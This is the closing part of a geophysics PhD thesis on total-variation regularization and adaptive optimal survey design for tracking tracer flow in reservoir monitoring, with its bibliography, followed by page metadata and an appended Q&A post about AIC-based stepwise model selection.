Two different inversions were carried out to recover models m_k by applying two different regularization functions. First, a linear inversion was performed where the regularization operator L = I was assigned to promote smallness in the recovered models. Alternately, L = GRAD is a common choice to promote smooth edges in the models. However, since the original model has sharp edges, using a smooth recovery may lead to more inaccurate results.

Second, a non-linear inversion was performed with smoothed total variation (TV) as the regularization (Ascher et al., 2006). The total variation regularization promotes discontinuous boundaries, or sharp edges. This is particularly valid for this experiment, since the tracer advection model does not include a diffusion term: the tracer model is concentrated in the circle and zero everywhere else.
In this ideal case there should be no diffusion of the tracer, and thus the boundaries should remain sharp as the tracer moves along in the fluid velocity field.

In continuous space, smoothed total variation is described by the following relation,

R(m) = ∫_Ω φ(|∇m|) dx,   (5.34)

where the convex function φ(c) = √(c² + ε) is an approximation to the ℓ_1 norm. A standard discrete approximation for the smoothed total variation regularization, found in (Ascher et al., 2006), is

R(m) = h² e^T √(A_cf((GRAD m) ⊙ (GRAD m)) + ε),   (5.35)

where the gradient operator GRAD maps from cell centers to cell faces, and the averaging matrix A_cf maps from faces to cell centers.
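A one-dimensional version of the discrete smoothed TV (5.35) makes the construction explicit. The forward-difference gradient and the two-point face-to-center average below are simple stand-ins for the staggered-grid operators, and the value of ε is an arbitrary choice:

```python
import numpy as np

def smoothed_tv_1d(m, h=1.0, eps=1.0e-6):
    """Discrete smoothed total variation in 1D, cf. Eq. (5.35)."""
    grad = np.diff(m) / h                           # GRAD m, values on faces
    g2 = grad**2
    # Average face values back to the cell centers (boundary faces set to 0).
    avg = 0.5 * (np.concatenate(([0.0], g2)) + np.concatenate((g2, [0.0])))
    return h * np.sum(np.sqrt(avg + eps))

m = np.zeros(100)
m[40:60] = 1.0                                      # sharp-edged "tracer"
print(smoothed_tv_1d(m))                            # penalizes the two jumps
```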
Although the optimal design method was formulated based on a linear estimation of m_k, it is not unreasonable to estimate m_k using the optimal design for the linear model estimation problem with a non-linear regularization, provided that this contributes to recovering the best estimates of m_k. As can be seen in Figure 5.2, the overall relative model error for estimates recovered with the total variation regularization is significantly lower than that of the models estimated using the linear regularization. Thus the estimates obtained using the TV regularization are more accurate with respect to the true model for this particular problem. Since the monitor function has a very large impact on the future optimal designs, it is desirable to get the best possible estimate of m_k.

Figure 5.2: Plot of the relative error ‖m_1^true − m̂_1‖/‖m_1^true‖ versus the regularization parameter α for both the linear regularization and smoothed total variation. The TV regularization gives a better estimate of the model for the case of a sharp target.

5.4.2 Monitor function

To design only for the tracer and not the entire reservoir, the difference entering the monitor function is defined by δ = |m_k − m_b|, where m_b is the background model (that is, the model without the dynamic target). Because neither the estimated model nor the background model is perfect, a threshold value θ was chosen to remove unwanted or erroneous information from δ. The background model m_b is the model used to compute the velocity field in Equation (2.3c).

5.5 Design results: exact dynamics

For the exact case, data were simulated by marching the tracer along in time for time steps of 25 days and measured by conducting a tomography survey at each time, with 4% Gaussian noise added to each data set. In total, 9 experiments were conducted for times t_0, t_1, …, t_8.

The initial design for time point t_0 did not include the dynamics. This amounts to setting ψ_0 = 1 everywhere. The design optimization problem in this case is identical to the static case and produces an optimal design based only on the physics and information from the linear regularization operator L = I. This is apparent in both the plot of the weights for experiment 1 at time t_0 in Figure 5.3 and the image of the rays in Figure 5.5, where the design specifies fewer rays that cover the entire domain.

For each experiment, the amse was plotted versus the number of nonzero weights for a set of penalty parameters β; see Figure 5.3 for examples for times t_0, t_2, t_4. From these curves, the best set of weights was chosen such that the weights were sparse, but also so that the amse was kept reasonably small. After a set of weights was chosen, both m_0 and the current model m_k were reconstructed from the reduced set of data d_k, in addition to the reconstruction obtained from the original A-optimal design from t_0, and using all data, for both the linear regularization and TV.

Figure 5.3: Exact dynamics: plots of the adapted mean squared error (amse) vs. the number of nonzero weights (left column), and the weights used to conduct experiments 1, 3, and 5, at times t_0, t_2, t_4.

The values of d which contribute to the reduced data set correspond to the non-zero weights of w_k. The total number of data required to image the models is significantly reduced: in most cases the number of data is on average 60 of a possible 600.

The model error was then calculated for each case with respect to the ground-truth model for each experiment, and is plotted in Figure 5.4. It is clear from the figure that models estimated using all data have the lowest mse compared with the true model. However, those constructed with the reduced set, particularly when using the TV regularization, are not far off. This implies that one can gain a reasonable estimate of the model from a significantly reduced set of data, without giving up too much in accuracy.

In Figure 5.5 the rays corresponding to d_k used to estimate the current models are pictured in blue over an image of the model. Note that the rays tend to follow the target as it moves through the domain and pass through the tracer. There are some spurious rays that do not pass through the tracer which are included in the optimal design. However, since the design depends on the monitor function ψ(m̂_0), and the reconstructions of m̂_0 are never exact, these spurious rays are expected.

It is also apparent that the number of spurious rays increases further in time, even though estimates of m_0 improve as more data are collected. In particular, at time t_6 it appears that the design algorithm has a harder time generating a design that captures the target well: there are many more rays which do not pass through the target. This is partially due to the increasing number of multiplications by the transport matrix T as time progresses, compounding errors, but also the loss of mass as the tracer exits the domain out of the sink. This is also apparent in the error calculations in Figure 5.4, where even while estimating models using all data, the error increases over time. However, the designs still provide enough information to recover models which indicate the location of the tracer. The reconstructions of m_k with smoothed total variation as the regularization are much closer to the true models, even when the optimal design was computed for the linear regularization model estimation problem. Again, this is to be expected, since the true model has discontinuous edges and since there is no diffusion in the flow model.

Figure 5.4: Exact dynamics: relative error plots. Model error is compared for each experiment for both the linear and TV regularization.
5.6 Results: inexact dynamics

For the first experiment w_0, the initial experiment computed in the noiseless example was used in the subsequent design estimations. The covariance matrices Q_k were assigned a scalar value for the variance at each time step to represent independently and identically distributed (iid) noise in the dynamics, such that Q_k = σ_k I. A constant value was assigned for the standard deviation, σ_k = 0.2, for all experiments. Models were reconstructed using the non-linear smoothed total variation regularization, and also with the linear regularization. The model estimation error is plotted in Figure 5.6.

Models were estimated using all data, the initial A-optimal design for each experiment, and finally the adaptive-method reduced data set. It is again clear that inversion carried out using all data generated models with the lowest mse; however, the benefit of reducing the number of measurements to approximately 60 from 600 might be much greater than the loss in accuracy in the model estimates, depending on the cost of data acquisition. The designs and model estimates are pictured in Figure 5.7. Notice that in this case there are fewer spurious rays. It is apparent that adapted A-optimal designs were again able to track the motion of the tracer with a significantly reduced set of measurements.

5.7 Summary

In this chapter, a new method for the design of experiments for dynamical systems was presented. The method generates survey designs which adapt to the motion of specific areas of the model while incorporating historic data.

Figure 5.5: Exact dynamics: optimal designs and recovered models for 9 experiments. The top row shows the rays and the recovered model, with the number of rays (#d = 297 for the initial design) given below, followed by the true models in the second row, the models recovered using total variation in the third row, and finally the models recovered using the linear gradient regularization.

Figure 5.6: Inexact dynamics: relative error plots. Model error is compared for each experiment for both the linear and TV regularization.

The motivation for not simply applying static optimal design methods to the dynamic problem is that the mean squared error of the current estimated model never contains information from previous data.
To this end, the design optimization problem "knows" nothing about the changes in the model due to the dynamics, and thus designs that are based on classical formulations only reflect information from the physics and the regularization (or prior) of the estimation problem.

The adaptive optimal experimental design approach is based on the introduction of a monitor function which scales the mean squared error of an estimator, whose motion is governed by a dynamical system, according to historic data. To determine a design for a future experiment, the adaptive mse (amse) is minimized with the added constraint that the design is sparse. Two model estimation problems were considered, whose construction depends on the characterization of the error in the dynamical system. This leads to experimental designs that track the changes in the model with a reduced set of measurements. The methodology was tested using seismic tomography to image the advection of a tracer in a reservoir.

Figure 5.7: Inexact dynamics: optimal designs and recovered models for 9 experiments. The top row shows the rays and the recovered model, with the number of rays given below. The second row pictures the true models, the third shows the models recovered using total variation, and finally the bottom shows the models recovered using the linear gradient regularization.

Chapter 6 Conclusions

The main objective of the research presented in this thesis was to improve reservoir monitoring and forecasting by coupling geophysical survey techniques with a dynamic fluid flow model and optimally designing the geophysical survey.

Forecasting of flow within a reservoir requires knowledge of fluid flow parameters, such as hydraulic conductivity. Estimates of such parameters can be obtained by direct measurements from subsurface rock samples, or through the inversion of flow data. However, these estimates are often highly inaccurate due to sparse measurements of both the parameters and flow data.

Therefore, one approach investigated in this thesis, which includes a higher sampling of measurements without adding a large additional cost to the monitoring program, was to couple a geophysical survey with the dynamic fluid flow model in a single inverse problem, such that the unknown flow parameters could be estimated from geophysical data.

Geophysical surveys tend to cover much larger spatial areas at lower cost, since sensors can be deployed at the surface as well as below ground. Collecting fluid flow data requires expensive boreholes, and such data is thus sparsely sampled. In the context of an ill-posed, under-determined inverse problem, it is very difficult to estimate parameter models for large subsurface domains with little data. Thus, the greater number of data and the larger spatial coverage improve the estimates obtained by solving the coupled ill-posed inverse problem.

The second approach to improving reservoir monitoring proposed in this thesis was to compute optimal geophysical survey designs for data measurements for the coupled subsurface flow inverse problem. In this case, it is inefficient to collect data over regions of the subsurface where there is no change to the geophysical properties due to flow. Ideally, one would want to be able to adapt the survey with the changes in the subsurface flow.
However, traditional optimal design methods do not utilize historic estimates of the subsurface models in a way that includes them in the design optimization problem. To this end, the idea was to formulate an optimal design estimation method for the coupled geophysics and flow model inverse problem that includes historic model estimates.

To demonstrate the ideas proposed in the thesis, the physical models for the geophysical survey and the fluid flow model were first presented in Chapter 2. The choice of models was particularly important for the coupling problem. The seismic tomography experiment was chosen primarily due to its linearity, but also due to the fact that data can be collected from existing boreholes as well as from sensors placed on the surface. Borehole seismic tomography is also commonly used in practice, with a wide variety of applications, making it an ideal survey for the model reservoir monitoring problem.

The tracer advection model was used because of its linearity and because it is very similar mathematically to more complex multiple-phase flow models. In addition, as was shown in Section 2.3, the advection of the tracer can also be thought of as the advection of the seismic slowness. This result eliminates the need for a petrophysical function relating the geophysical properties (seismic slowness) to flow parameters (tracer or hydraulic conductivity). Technically, the tracer advection model lends itself to efficient numerical optimization schemes; in particular, a stable and differentiable discretization of the physical models was applied. For the discretization of the flow, a particle-in-cell method was used, whose stability is independent of the time-step size and which can therefore be safely applied even if the fluid velocity field is unknown. The fluid velocity field was discretized on staggered grids, resulting in a stable discretization of the regularization operators and flow constraints; see Section 2.4 for details.

Following the introduction of the physical models, Chapter 3 provides a brief introduction to linear inversion and highlights the different formulations which result from different characterizations of the noise in the dynamical fluid flow model: zero noise and non-zero noise. The choice of noise characterization is important not only because it results in different formulations of the inverse problem, but also because it is often difficult to estimate a priori.

In Chapter 4, a new methodology for estimating the initial tracer concentration and fluid velocity field from geophysical data was presented for the case where the noise in the dynamical flow model was assumed to be zero for all times. The new estimation problem was formulated as a constrained inverse problem with a specifically tailored regularization for the velocity field that promotes discontinuities in the tangential components of the estimated flow field. Estimates of the velocity were then used for the estimation of the hydraulic conductivity.

Numerical results for a simple layered earth model with a homogeneous isotropic reservoir demonstrated that this new approach yields not only accurate estimates of the initial change to the slowness but, especially, accurate predictions of the fluid flow velocity and tracer evolution. The work was published in the SIAM Journal on Scientific Computing (Fohring et al., 2014). However, a number of topics relating to the coupled geophysics flow problem have yet to be studied.

One important aspect of the inverse problem is the evaluation of uncertainty in the flow.
Although the error in the dynamic flow model was assumed to be zero, it is likely that measurement and numerical errors were propagated with the dynamics throughout the inverse problem. This was particularly apparent when the number of historic experiments, and thus time steps, increased. With increased time steps came an increase in the difficulty of recovering an accurate approximation to the true velocity field. This is counter to what one would expect, namely that more information should provide better results, and is likely due to the noise propagation. In particular, the particle-in-cell (PIC) discretization of the tracer advection equation relies on a bilinear interpolation. Bilinear interpolation error is quadratic, and thus with each time step, and therefore each multiplication of the tracer by the interpolation matrix, the error grows. Experimenting further with higher-order interpolations may therefore help to reduce error propagation. However, higher-order interpolation functions may simultaneously add complexity to the inverse problem because of the difficulty associated with computing gradients.

An additional topic of research involves applying the coupled problem with more complex flow models. However, the use of such models might require the knowledge of petrophysical parameter functions and the application of differing discretization techniques that are not necessarily stable for all time step lengths. This would lead to added complexity in the inverse problem, which would require innovative solution techniques.

Finally, to truly demonstrate the ability of the method to recover fluid flow parameters, a field or laboratory experiment to obtain a real data set is required to fully evaluate the contribution of the work to reservoir monitoring and geophysical history matching.

To address the second goal of the thesis, Chapter 5 presents a new adaptive optimal experimental design method for the linear coupled reservoir monitoring problem. The new adapted mean square error (amse) method builds on classical A-optimal design criteria by altering the posterior mean squared error (mse) of a model estimate to include historic data. In the classic case the mse is minimized to recover an optimal set of measurements. Since the mse for the linear estimator includes only the physics and the prior covariance matrix, designs do not adapt with the motion of the tracer. The amse was therefore defined to include historic data through an introduced monitor function. Results presented in Section 5.4 demonstrate the amse method for the coupled seismic tomography tracer advection. Applying the method produced designs that tracked the motion of the tracer, while requiring significantly fewer measurements to recover images of the tracer compared with using all available data. The amse optimal design method research presented in the thesis is currently in the final review process for publication in the SIAM Journal on Uncertainty Quantification (Fohring and Haber, 2016).

The idea to include historic information in the amse through the introduction of a monitor function originates from adaptive mesh methods. In this thesis only two options for the monitor function were chosen and tested. Thus there is significant room for further investigation of how differing monitor functions can affect optimal designs.

The adapted design criteria presented in the thesis only included reducing the number of measurements from a maximum set.
However, in many cases it might be more efficient to eliminate entire borehole locations, instead of just individual sensor locations, and additionally to impose a monetary cost on more expensive measurement locations to quantitatively estimate cost reduction.

Another avenue of investigation includes designing for dynamic coupled non-linear inverse problems. Current non-linear design methods are limited by the fact that there is no closed-form calculation of the posterior mean squared error. This results in expensive bi-level design optimization problems that require training sets of possible models. However, for the coupled dynamic problem there may be room to include historic estimates through propagation of earlier-time models to generate training sets.

Recently, (Alexanderian et al., 2015) presented a method for A-optimal design for non-linear inverse problems where the posterior covariance matrix is approximated by a stochastic average over a set of data via an approximate Hessian. The method was demonstrated for an advection-diffusion flow problem. Building on this method might be an interesting approach to introducing the adaptive design method for non-linear problems.

One might also ask how sensitive the adaptive optimal design is to variations in the fluid velocity field. This could be investigated by estimating and updating the flow dynamics in time, and would amount to developing an adaptive optimal design method for the constrained variable projection problem, that is, for the non-linear flow-coupled inverse problem presented in Chapter 4.

Bibliography

Abacioglu, Y., Oliver, D., and Reynolds, A. (2001). Efficient reservoir history matching using subspace vectors. Computational Geosciences, 5(2):151-172.
Abul, F. (2010). 4D Seismic History Matching Using the Ensemble Kalman Filter (EnKF): Possibilities and Challenges. PhD thesis, University of Bergen.
Aggarwal, R., Demkowicz, M., and Marzouk, Y. M. (2015). Information-driven experimental design in materials science. In Information Science for Materials Discovery and Design, volume 225, chapter 2, pages 13-44. Springer International Publishing.
Ajo-Franklin, J. B. (2009). Optimal experiment design for time-lapse traveltime tomography. Geophysics, 74(4):Q27-Q40.
Alexanderian, A., Petra, N., Stadler, G., and Ghattas, O. (2014). A-optimal design of experiments for infinite-dimensional Bayesian linear inverse problems with regularized l0-sparsification. SIAM Journal on Scientific Computing, 36(5):2122-2148.
Alexanderian, A., Petra, N., Stadler, G., and Ghattas, O. (2015). A fast and scalable method for A-optimal design of experiments for infinite-dimensional Bayesian nonlinear inverse problems. SIAM Journal on Scientific Computing, pages 1-29.
Alumbaugh, D. L. and Morrison, H. F. (1995). Monitoring subsurface changes over time with cross-well electromagnetic tomography. Geophysical Prospecting, 43(7):873-902.
Aravkin, A. (2010). Robust Methods for Kalman Filtering/Smoothing and Bundle Adjustment. PhD thesis, University of Washington.
Aravkin, A. Y., Bell, B. M., Burke, J. V., and Pillonetto, G. (2013). Kalman smoothing and block tridiagonal systems: new connections and numerical stability results. arXiv preprint arXiv:1303.5237.
Archie, G. (1942). The electrical resistivity log as an aid in determining some reservoir characteristics. Petroleum Technology, 146(October):54-62.
Ascher, U. M., Haber, E., and Huang, H. (2006). On effective methods for implicit piecewise smooth surface recovery. SIAM Journal on Scientific Computing, 28(1):339-358.
Atkinson, A. C. and Donev, A. N. (1992). Optimum Experimental Designs. Clarendon Press.
Bardow, A. (2008). Optimal experimental design of ill-posed problems: The METER approach. Computers & Chemical Engineering, 32(1-2):115-124.
Benzi, M., Golub, G., and Liesen, J. (2005). Numerical solution of saddle point problems. Acta Numerica.
Biegler, L., Biros, G., Ghattas, O., Heinkenschloss, M., Keyes, D., Mallick, B., Marzouk, Y., Tenorio, L., van Bloemen Waanders, B., and Willcox, K., editors (2011). Large-Scale Inverse Problems and Quantification of Uncertainty. John Wiley & Sons.
Cassiani, G., Bohm, G., Vesnaver, A., and Nicolich, R. (1998). A geostatistical framework for incorporating seismic tomography auxiliary data into hydraulic conductivity estimation. Journal of Hydrology, 206(1-2):58-74.
Chaloner, K. and Verdinelli, I. (1995). Bayesian experimental design: A review. Statistical Science, 10(3):273-304.
Chan, T. F., Golub, G. H., and Mulet, P. (1999). A nonlinear primal-dual method for total variation-based image restoration. SIAM Journal on Scientific Computing, 20(6):1964-1977.
Chen, Z., Huan, G., and Ma, Y. (2006). Computational Methods for Multiphase Flows in Porous Media. SIAM.
Chernoff, H. (1972). Sequential Analysis and Optimal Design, volume 8. SIAM.
Chung, J., Haber, E., and Nagy, J. (2006). Numerical methods for coupled super-resolution. Inverse Problems, 22(4):1261-1272.
Chung, J. M.-L. (2009). Numerical Approaches for Large Scale Ill-posed Inverse Problems. PhD thesis, Emory University.
Cockett, R. and Haber, E. (2016). A numerical method for large scale estimation of distributed hydraulic conductivity from Richards equation. Journal of Hydrology, pages 1-15.
Curtis, A. (1999). Optimal experiment design: cross-borehole tomographic examples. Geophysical Journal International, 136(3):637-650.
Doyen, P. M. (1988). Porosity from seismic data: A geostatistical approach. Geophysics, 53(10):1263-1275.
Edwards, E. and Bridson, R. (2012). A high-order accurate particle-in-cell method. International Journal for Numerical Methods in Engineering, 90(9):1073-1088.
Emerick, A. A. and Reynolds, A. C. (2012). History matching time-lapse seismic data using the ensemble Kalman filter with multiple data assimilations. Computational Geosciences, 16(3):639-659.
Evans, M. W. and Harlow, F. H. (1957). The particle-in-cell method for hydrodynamic calculations. Science (New York, N.Y.), 178(4066):76.
Evensen, G. (1994). Sequential data assimilation with a nonlinear quasi-geostrophic model using Monte Carlo methods to forecast error statistics. Journal of Geophysical Research, 99(C5):10143.
Fedorov, V. (1972). Theory of Optimal Experiments. Elsevier.
Fletcher, C. (2012). Computational Techniques for Fluid Dynamics 2: Specific Techniques for Different Flow Categories. Springer Science & Business Media.
Fohring, J. and Haber, E. (2016). Adaptive A-optimal experimental design for linear dynamical systems. SIAM Journal on Uncertainty Quantification, xx:1-19.
Fohring, J., Haber, E., and Ruthotto, L. (2014). Geophysical imaging of fluid flow in porous media. SIAM Journal on Scientific Computing, 36(5):218-236.
Fohring, J., Ruthotto, L., and Haber, E. (2013). Geophysical imaging, reservoir history matching and forecasting. In 2013 SEG Annual Meeting, Houston. Society of Exploration Geophysicists.
Gerritsen, M. G. and Durlofsky, L. J. (2005). Modeling fluid flow in oil reservoirs. Annual Review of Fluid Mechanics, 37(1):211-238.
Gharamti, M. E., Marzouk, Y. M., Huan, X., and Hoteit, I. (2015). A greedy approach for placement of subsurface aquifer wells in an ensemble filtering framework. In Dynamic Data-Driven Environmental Systems Science, volume 8964, pages 301-309. Springer International Publishing, Switzerland.
Golub, G. and Greif, C. (2003). On solving block-structured indefinite linear systems. SIAM Journal on Scientific Computing.
Golub, G. and Pereyra, V. (2003). Separable nonlinear least squares: the variable projection method and its applications. Inverse Problems, 19(2):R1-R26.
Gosselin, O., Aanonsen, S. I., Aavatsmark, I., and Cominelli, A. (2003). History matching using time-lapse seismic (HUTS). In SPE Annual Technical Conference and Exhibition, pages 1-15.
Haber, E. and Ascher, U. (2001). Fast finite volume simulation of 3D electromagnetic problems with highly discontinuous coefficients. SIAM Journal on Scientific Computing.
Haber, E., Horesh, L., and Tenorio, L. (2008). Numerical methods for experimental design of large-scale linear ill-posed inverse problems. Inverse Problems, 24(5):055012.
Haber, E., Horesh, L., and Tenorio, L. (2010). Numerical methods for the design of large-scale nonlinear discrete ill-posed inverse problems. Inverse Problems, 26(2):025002.
Haber, E., Magnant, Z., and Lucero, C. (2011). Numerical methods for A-optimal designs with a sparsity constraint. Computational Optimization and Applications, 52(1):293-314.
Hansen, P. (1998). Rank-deficient and Discrete Ill-posed Problems: Numerical Aspects of Linear Inversion. SIAM.
Hoversten, G. M., Cassassuce, F., Gasperikova, E., Newman, G. A., Chen, J., Rubin, Y., Hou, Z., and Vasco, D. (2006). Direct reservoir parameter estimation using joint inversion of marine seismic AVA and CSEM data. Geophysics, 71(3):C1.
Huan, X. and Marzouk, Y. M. (2013). Simulation-based optimal Bayesian experimental design for nonlinear systems. Journal of Computational Physics, 232(1):288-317.
Huang, H., Haber, E., and Horesh, L. (2012). Optimal estimation of l1-regularization prior from a regularized empirical Bayesian risk standpoint. Inverse Problems and Imaging, 6(0):447-464.
Hubbard, S. S. and Rubin, Y. (2000). Hydrogeological parameter estimation using geophysical data: a review of selected techniques.
Hutchinson, M. (1990). A stochastic estimator of the trace of the influence matrix for Laplacian smoothing splines. Communications in Statistics - Simulation and Computation, 19(2):433-450.
Hyndman, D. W., Harris, J. M., and Gorelick, S. M. (1994). Coupled seismic and tracer test inversion for aquifer property characterization. Water Resources Research, 30(7):1965.
Jones, I. F. (2010). Tutorial: Velocity estimation via ray-based tomography. First Break, 28(2):45-52.
Kalman, R. E. (1960). A new approach to linear filtering and prediction problems. Transactions of the ASME - Journal of Basic Engineering, 82(Series D):35-45.
Khodja, M. R., Prange, M. D., and Djikpesse, H. A. (2010). Guided Bayesian optimal experimental design. Inverse Problems, 26(5):055008.
Lucero, C. (2013). Bayes Risk A-optimal Experimental Design for Ill-posed Inverse Problems. PhD thesis, Colorado School of Mines.
Lumley, D. E. (2001a). The next wave in reservoir monitoring: The instrumented oil field. The Leading Edge, 20(6):640-648.
Lumley, D. E. (2001b). Time-lapse seismic reservoir monitoring. Geophysics, 66(1):50-53.
Mavko, G., Mukerji, T., and Dvorkin, J. (2009). The Rock Physics Handbook. Cambridge University Press.
McKee, S., Tomé, M. F., Ferreira, V. G., Cuminato, J. A., Castelo, A., Sousa, F. S., and Mangiavacchi, N. (2008). The MAC method. Computers and Fluids, 37(8):907-930.
Mezghani, M., Fornel, A., Langlais, V., and Lucet, N. (2013). History matching and quantitative use of 4D seismic data for an improved reservoir characterization. In SPE Annual Technical Conference and Exhibition. Society of Petroleum Engineers.
Modersitzki, J. (2009). FAIR: Flexible Algorithms for Image Registration. SIAM.
Nævdal, G., Mannseth, T., and Vefring, E. H. (2002). SPE 75235: Near-well reservoir monitoring through ensemble Kalman filter. SPE International, 75235(1):1-9.
Nenna, V., Pidlisecky, A., and Knight, R. (2011). Application of an extended Kalman filter approach to inversion of time-lapse electrical resistivity imaging data for monitoring recharge. Water Resources Research, 47(10):1-13.
Nocedal, J. and Wright, S. (2000). Numerical Optimization. Springer Science & Business Media.
Nolet, G. (1987). Seismic Tomography: With Applications in Global Seismology and Exploration Geophysics. Springer Science & Business Media.
Oldenburg, D. and Pratt, D. (2002). Geophysical inversion for mineral exploration. Geophysical Inversion Facility.
Oliver, D. S. and Chen, Y. (2010). Recent progress on reservoir history matching: a review. Computational Geosciences, 15(1):185-221.
Oliver, D. S., Reynolds, A. C., and Liu, N. (2008). Inverse Theory for Petroleum Reservoir Characterization and History Matching. Cambridge University Press.
Papalambros, P. Y. and Wilde, D. J. (2000). Principles of Optimal Design: Modeling and Computation. Cambridge University Press.
Parker, R. L. (1994). Geophysical Inverse Theory. Princeton University Press.
Pollock, D. and Cirpka, O. A. (2012). Fully coupled hydrogeophysical inversion of a laboratory salt tracer experiment monitored by electrical resistivity tomography. Water Resources Research, 48(January):1-13.
Pukelsheim, F. and Studden, W. J. (1993). E-optimal designs for polynomial regression. The Annals of Statistics, 21(1):402-415.
Roubinet, D., de Dreuzy, J.-R., and Tartakovsky, D. M. (2013). Particle-tracking simulations of anomalous transport in hierarchically fractured rocks. Computers & Geosciences, 50:52-58.
Sagnol, G. and Harman, R. (2014). Optimal designs for steady-state Kalman filters. ZIB Report, 39(October).
Sarma, P., Durlofsky, L. J., Aziz, K., and Chen, W. H. (2013). A new approach to automatic history matching using kernel PCA. In SPE Reservoir Simulation Symposium. Society of Petroleum Engineers.
Slater, L., Binley, A. M., Daily, W., and Johnson, R. (2000). Cross-hole electrical imaging of a controlled saline tracer injection. Journal of Applied Geophysics, 44(2-3):85-102.
Stark, P. B. and Tenorio, L. (2010). A primer of frequentist and Bayesian inference in inverse problems. Large-Scale Inverse Problems and Quantification of Uncertainty, pages 9-32.
Steklova, K. and Haber, E. (2015). Joint hydrogeophysical inversion: State estimation for seawater intrusion models in 3D. Journal of Hydrology.
Tenorio, L. (2001). Statistical regularization of inverse problems. SIAM Review, 43(2):347-366.
Tikhonov, A. and Arsenin, V. (1977). Solutions of Ill-Posed Problems. Winston, New York.
Trani, M. (2012). From Time-lapse Seismic Inversion to History Matching of Water-flooded Oil Reservoirs. PhD thesis, Delft University.
Vasco, D. W., Datta-Gupta, A., Behrens, R., Condon, P., and Rickett, J. (2004). Seismic imaging of reservoir flow properties: Time-lapse amplitude changes. Geophysics, 69(6):1425-1442.
Vauhkonen, M., Karjalainen, P. A., and Kaipio, J. P. (1998). A Kalman filter approach to track fast impedance changes in electrical impedance tomography. IEEE Transactions on Biomedical Engineering, 45(4):486-493.
Vesnaver, A. L., Accaino, F., Bohm, G., Madrussani, G., Pajchel, J., Rossi, G., and Moro, G. D. (2003). Time-lapse tomography. Geophysics, 68(3):815-823.
Wilkinson, P. B., Uhlemann, S., Meldrum, P. I., Chambers, J. E., Carriere, S., Oxby, L. S., and Loke, M. H. (2015). Adaptive time-lapse optimized survey design for electrical resistivity tomography monitoring. Geophysical Journal International, 203(1):755-766.
Wilt, B. M., Morrison, H. F., Becker, A., and Torres-Verdin, C. (1995). Crosshole electromagnetic tomography: A new technology for oil field characterization. The Leading Edge, 14(3):173-177.
Yilmaz, O. (2013). Seismic Data Analysis: Processing, Inversion, and Interpretation of Seismic Data. Society of Exploration Geophysicists.
[ null, "https://open.library.ubc.ca/img/featured/icon-ubctheses.svg", null, "https://open.library.ubc.ca/img/iiif-logo.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.84347236,"math_prob":0.96752125,"size":154155,"snap":"2019-43-2019-47","text_gpt3_token_len":37933,"char_repetition_ratio":0.19746223,"word_repetition_ratio":0.117654696,"special_character_ratio":0.23521131,"punctuation_ratio":0.19721507,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9720795,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-19T14:14:47Z\",\"WARC-Record-ID\":\"<urn:uuid:7e42a57a-2dc4-42e1-9c62-1c4cf64b7451>\",\"Content-Length\":\"410269\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4db185c0-329e-4495-bf6e-4a084e593f7c>\",\"WARC-Concurrent-To\":\"<urn:uuid:29a12614-341f-4ccb-ac89-5b5ec181c837>\",\"WARC-IP-Address\":\"142.103.96.89\",\"WARC-Target-URI\":\"https://open.library.ubc.ca/cIRcle/collections/ubctheses/24/items/1.0300491\",\"WARC-Payload-Digest\":\"sha1:OANB2XVS6CKMO7X6C7K25T4KCB6MOQPM\",\"WARC-Block-Digest\":\"sha1:TDV46NW62BVYCOEJKXV2INECAEGCEBBB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496670151.97_warc_CC-MAIN-20191119121339-20191119145339-00048.warc.gz\"}"}
https://stats.stackexchange.com/questions/87234/aic-values-and-their-use-in-stepwise-model-selection-for-a-simple-linear-regress
[ "# AIC values and their use in stepwise model selection for a simple linear regression

The Wikipedia article for AIC says the following (emphasis added):

As an example, suppose that there were three models in the candidate set, with AIC values 100, 102, and 110. Then the second model is exp((100−102)/2) = 0.368 times as probable as the first model to minimize the information loss, and the third model is exp((100−110)/2) = 0.007 times as probable as the first model to minimize the information loss.

In this example, we would omit the third model from further consideration. We then have three options: (1) we could decide to gather more data, in the hope that this will allow clearly distinguishing between the first two models; (2) we could simply conclude that the data is insufficient to support selecting one model from among the first two; (3) we could take a weighted average of the first two models, with weights 1 and 0.368, respectively, and then do statistical inference based on the weighted multimodel.

However, a video discussing the stepwise method for model selection in R removes the smallest AIC value. It may be that I am grossly misunderstanding something about how AIC works and how AIC is applied. Could anyone explain why we would not want to select the largest value in the video as was done in the Wikipedia example?

That having been said, the answer to your specific question is that you are misunderstanding what is being shown in the video. What the R output displayed in the video means is that the AIC listed on the far right is what the model would have if you dropped the variable in question. Lower AIC values are still better, both in the Wikipedia article and in the video. In the middle of the video, the presenter walks through reading the output and shows that dropping C2004 would lead to a new model with AIC = 16.269. This is the lowest AIC possible, so it is the best model, so the variable you should drop is C2004. The presenter is not saying that you should drop that model, but that you should drop C2004 from the current model to get that model. The second model, under step, can be seen on the same screen. You can see that model does not include the variable C2004 and has AIC = 16.27. (Again, for the record, using the AIC in this way is invalid; I'm just explaining what the video is recommending.)", null, "" ]
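A quick way to reproduce the arithmetic in the quoted Wikipedia example; a minimal Python sketch (ours, not from the thread). Normalizing the relative likelihoods gives the Akaike weights used for model averaging:

```python
import math

# Relative likelihoods exp((AIC_min - AIC_i)/2) for the quoted example.
aics = [100, 102, 110]
best = min(aics)
rel = [math.exp((best - a) / 2) for a in aics]
print(rel)  # approximately [1.0, 0.368, 0.0067]

# Normalizing gives Akaike weights for weighted multimodel inference.
weights = [r / sum(rel) for r in rel]
print([round(w, 3) for w in weights])
```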
[ null, "https://i.stack.imgur.com/IVINw.png", null ]
